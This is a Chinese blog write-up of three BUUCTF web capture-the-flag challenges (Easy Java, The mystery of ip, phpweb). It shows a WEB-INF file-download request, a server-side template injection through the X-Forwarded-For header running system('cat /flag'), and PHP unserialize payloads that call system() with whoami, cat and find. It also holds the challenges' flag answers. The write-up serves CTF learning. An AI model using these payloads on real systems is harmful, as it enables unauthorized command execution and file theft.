BUUCTF Web [RoarCTF 2019]Easy Java1 & [BJDCTF2020]The mystery of ip1 & [网鼎杯 2020 朱雀组]phpweb1

已于 2023-05-30 11:16:25 修改
阅读量250 收藏
点赞数 1
分类专栏: BUUCTF Web 文章标签: 安全
于 2022-09-18 12:13:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64558270/article/details/126914473
版权

目录

 

[RoarCTF 2019]Easy Java1

​编辑

[BJDCTF2020]The mystery of ip1

[网鼎杯 2020 朱雀组]phpweb1

 

[RoarCTF 2019]Easy Java1

启动靶机

a0c4b33f3d5841ed9a649f9e251a38fb.bmp

 尝试一些弱口令,万能密码,发现都不可行。点击help

fdf0d1a68c4c4c36a5c473750d977fc3.png

观察此页面的url

39b69232796340109e3f8fe05b94ddd0.png

对于我这种java不太好的,似乎没啥思路了,看了看大佬的wp

这道题利用的任意下载漏洞,打开hackbar,使用POST传参

a3b5e167bcd54d7fa2a9640e3a0a14d5.png

打开这个文件看一看,发现了一个与flag相关的

f9282078f42847eda95c13cc73abd64b.png

 构造路径访问一下

filename=/WEB-INF/classes/com/wm/ctf/FlagController.class

 下载完后,使用java在线反编译(JAVA反向工程网),下载反编译后的文件

import java.io.IOException;
import java.io.PrintWriter;
import javax.servlet.ServletException;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

@WebServlet(
   name = "FlagController"
)
public class FlagController extends HttpServlet {

   String flag = "ZmxhZ3tmY2QwZmRhOC1hYWFkLTQ1YTAtOTZkZS1kYWFkZGI2ZTdhZjJ9Cg==";


   protected void doGet(HttpServletRequest var1, HttpServletResponse var2) throws ServletException, IOException {
      PrintWriter var3 = var2.getWriter();
      var3.print("<h1>Flag is nearby ~ Come on! ! !</h1>");
   }
}

可以看到一行flag

c52d4c83e5a646d48765dbcb846e7948.png

复制到base64在线解密中

ad61466cefea4521b80c475aed9a4c67.png

拿到flag               flag{fcd0fda8-aaad-45a0-96de-daaddb6e7af2} 

[BJDCTF2020]The mystery of ip1

启动靶机

f9430a7f890f43119a1996439f4f7177.png

发现左上角三个标签,点击Flag

9ff0e2aefb46441284e71e04067f8098.png

直接返回了一个ip地址,但是我的ip与页面返回的并不相同。

看来需要抓包改ip尝试了,启动burp,点击Flag,抓一下包

增加X-Forwarded-For,重放

X-Forwarded-For:127.0.0.1

6829d8d8b8904844bbcbc184c7fabc18.png

猜测XFF处可能存在命令执行

X-Forwarded-For:{{system(whoami)}}

69692b12fdfe4d8586a934d4b2ce7514.png

 既然可以命令执行,直接读/flag

X-Forwarded-For:{{system('cat /flag')}}

 3593c50bb2ef401bae06c30019753e79.bmp

 Forward放包

8a578bc219b6414eb941f7764e21b83b.png

拿到flag                  flag{1dda6480-b436-4dcd-8ab8-5d0c32943cb3}  

[网鼎杯 2020 朱雀组]phpweb1

启动靶机,又是熟悉的笑川(大头照就不截了)。

右键看一下源码,js中每隔五秒自动刷新。

还没什么思路,抓个包看看吧

01ffac5f6d684a48bc73353f5267f0ff.png

发现POST穿了两个参数,这应该是与call_user_func()函数有关。

传参查看index.php的源码

func=file_get_contents&p=index.php

9ef4a638ff92480ab871c1f8e2e79a13.png

发现了一段序列化的内容

   class Test {
        var $p = "Y-m-d h:i:s a";
        var $func = "date";
        function __destruct() {
            if ($this->func != "") {
                echo gettime($this->func, $this->p);
            }
        }
    }
    $func = $_REQUEST["func"];
    $p = $_REQUEST["p"];

    if ($func != null) {
        $func = strtolower($func);
        if (!in_array($func,$disable_fun)) {
            echo gettime($func, $p);
        }else {
            die("Hacker...");
        }
    }

 编写脚本

<?php
class Test {
    var $p = "whoami";
    var $func = "system";
    function __destruct() {
        if ($this->func != "") {
            echo gettime($this->func, $this->p);
        }
    }
}

$a=new Test();
echo serialize($a);

?>

复制到php在线编译中

341b54130e524481bf20b8c8ae874582.png

 拿到序列化的结果,构造payload

func=unserialize&p=O:4:"Test":2:{s:1:"p";s:6:"whoami";s:4:"func";s:6:"system";}

b6adc7100b0740b4b3e6358768005995.png

发现whoami可以成功执行,直接构造payload来查看/flag

func=unserialize&p=O:4:"Test":2:{s:1:"p";s:9:"cat /flag";s:4:"func";s:6:"system";}

7a4abea4958d4a50943350cb0d1ad5f0.png

发现无任何回显,看来flag不在/flag中,构造payload查找flag在哪 (需要遍历查找,所以请求时间会长一点)

func=unserialize&p=O:4:"Test":2:{s:1:"p";s:18:"find / -name flag*";s:4:"func";s:6:"system";}

8f56436771a34edca6ac97664efa9626.png

 盲猜flag放在最短的文件中,构造payload

func=readfile&p=/tmp/flagoefiu4r93

38fcf51d1e384267bc6fa41bfe718c39.png

拿到flag           flag{8c3bc62f-357b-4e25-bb79-ac92e34b7267} 

这道题主要考察了call_user_func()函数如何去调用系统命令,感兴趣的可以看一看这篇文章

 

WmVicmE=
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
【精品】备考2011高效学习方案英语高三册:Units 13~14  The mystery of the Moonstone & Zoology.doc
08-19
【精品】备考2011高效学习方案英语高三册:Units 13~14 The mystery of the Moonstone & Zoology.doc
[RoarCTF 2019]Easy Java 1
qq_64222098的博客
03-14 492
这里还有一个要用到的知识点WEB-INF目录下的classes,它包含了站点所有用的class文件,包括servert class和非servlet class。有关java web配置文件web.xml的漏洞产生原因:web.xml文件中有某个文件的相关映射的话,可以直接在页面访问这个文件,类似于文件包含。打开发现是这样的,看着有点像是sql注入,但是输入1’#发现它显示密码错误。可以看到在com.wm.ctf包下,有一个FlagController,猜测flag在这里面。可以得到web.xml文件。
BUUCTF】[RoarCTF 2019]Easy Java1
最新发布
qq_44724114的博客
05-08 522
和第3步一样,先hackbar通过post请求【要是再hackbar中execute不动,重新刷新该网址,如还是不行销毁靶机,重开】,进行bp抓包——send到repeater去,然后看repeater的响应。/WEB-INF/classes/:含了站点所有用的 class 文件,包括 servlet class 和非servlet class,他们不能包含在.jar文件中。/WEB-INF/lib/:存放web应用需要的各种JAR文件,放置仅在这个应用中要求使用的jar文件,如数据库驱动jar文件。
[RoarCTF 2019]Easy Java1
whale_waves的博客
11-13 206
WEB-INF是JAVAWEB应用安全目录,如果想在页面中直接访问其中的文件,必须通过web.xml文件对要访问的文件进行相应映射才能访问。(用post的原因,为什么get访问返回访问码200说明有这个文件并且允许访问,但为什么没有数据,就想试试post)因为站点所有用的class文件都在WEB-INF/classes里,查看配置文件只知道了flag的位置。一般情况,isp引擎默认都是禁止访问WEB-INF目录的,在一些特定的场合(Nginx配合。有download,难道是下载文件,访问看看。
[RoarCTF 2019]Easy Java1 (BUCTF在线评测)
邓霖涛的博客
07-15 298
BUUCTF答题学习
The Mystery of Legend-开源
06-28
一个关于传奇之谜的游戏,艾伦需要点燃它。 JRPG风格的游戏。
The Mystery
06-23
The Mystery Method_cn.rar
Mystery of Mobile Data Collecting AND Processing》PDF版本下载.txt
07-17
Mystery of Mobile Data Collecting AND Processing》PDF版本下载
22-郑康鹏-The Mystery Machine:End-to-end performance analysis of la
08-04
《The Mystery Machine:大型互联网服务端到端性能分析》 这篇论文出自2014年11月6日至8日在科罗拉多州布鲁姆菲尔德举行的第11届USENIX操作系统设计与实现研讨会。该研讨会的论文集由USENIX协会赞助并开放获取,...
web buuctf [RoarCTF 2019]Easy Java1
weixin_44214568的博客
03-22 2254
考点: java web.xml配置文件漏洞 漏洞:【漏洞公告】Java web.xml 信息泄漏漏洞 - 阿里云安全产品和技术 - 阿里云 漏洞产生原因:通常一些web应用我们会使用多个web服务器搭配使用,解决其中的一个web服务器的性能缺陷以及做均衡负载的优点和完成一些分层结构的安全策略等。在使用这种架构的时候,由于对静态资源的目录或文件的映射配置不当,可能会引发一些的安全问题,导致web.xml等文件能够被读取 漏洞利用:通过找到web.xml文件,推断class文件的路径,最后直接cla
BUUCTF闯关日记--[RoarCTF 2019]Easy Java1
qq_64201116的博客
05-13 755
送分=送命
[RoarCTF 2019]Easy Java
ChenZIDu的博客
12-13 5263
WEB-INF主要通过找到web.xml文件,推断class文件的路径,最后直接class文件,在通过反编译class文件,得到网站源码 首先看到一个页面,点击下help看看啥情况。 发现输出一串 java.io.FileNotFoundException:{help.docx} 可能是报错信息,打开Brup截取请求信息 GET /Download?filename=help.docx HTT...
BUUCTF [web专项34][RoarCTF 2019]Easy Java
yanglinchiji的博客
11-13 109
WEB-INF/classes/:含了站点所有用的 class 文件,包括 servlet class 和非servlet class,他们不能包含在 .jar文件中。/WEB-INF/lib/:存放web应用需要的各种JAR文件,放置仅在这个应用中要求使用的jar文件,如数据库驱动jar文件。/WEB-INF/web.xml:Web应用程序配置文件,描述了 servlet 和其他的应用件配置及命名规则。/WEB-INF/src/:源码目录,按照包名结构放置各个java文件。发现flag就在附近。
buuctf——Easy-Java
weixin_46107179的博客
08-04 404
有一个help点击进去是一个java的报错信息说未找到该文件,根据观察URL,可能是文件包含,根据题目提示是java,尝试读取WEB-INF/web.xml文件 发现还是不能读取到,尝试用burp改一下请求方式,结果读取到web.xml配置文件 根据java项目的结构可以得到class文件,(一般关于java得到源码的思路:通过找到web.xml文件,推断class文件的路径,最后直接class文件,在通过反编译class文件,得到网站源码) /WEB-INF/web.xml:Web应用程序配置文件,描述了
WEB-INF 基础知识
王嘟嘟的博客
04-08 5362
0x00 前言 对WEB-INF进行一个简单的了解。 0x01 正文 WEB-INF是javaWEB应用的安全目录。 1.WEB-INF目录 WEB-INF/web.xml web应用程序配置文件,描述了servlet和其他的应用件配置及命名规则。 WEB-INF/classes 包含了站点所有用的class文件,包括servlet class和非servlet class WEB-INF/...
[bjdctf2020]the mystery of ip
03-16
这是一道关于IP地址的谜题,需要我们了解IP地址的基本知识和相关的网络协议。通过分析题目中给出的IP地址和端口号,我们可以推测出这是一道关于TCP/IP协议的题目。我们需要使用Wireshark等网络抓包工具来捕获网络数据包,然后分析其中的IP地址和端口号,以及数据包的内容和协议类型,来解决这个谜题。同时,我们还需要了解一些常见的网络攻击和防御技术,以便更好地理解和解决这个谜题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

WmVicmE=

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值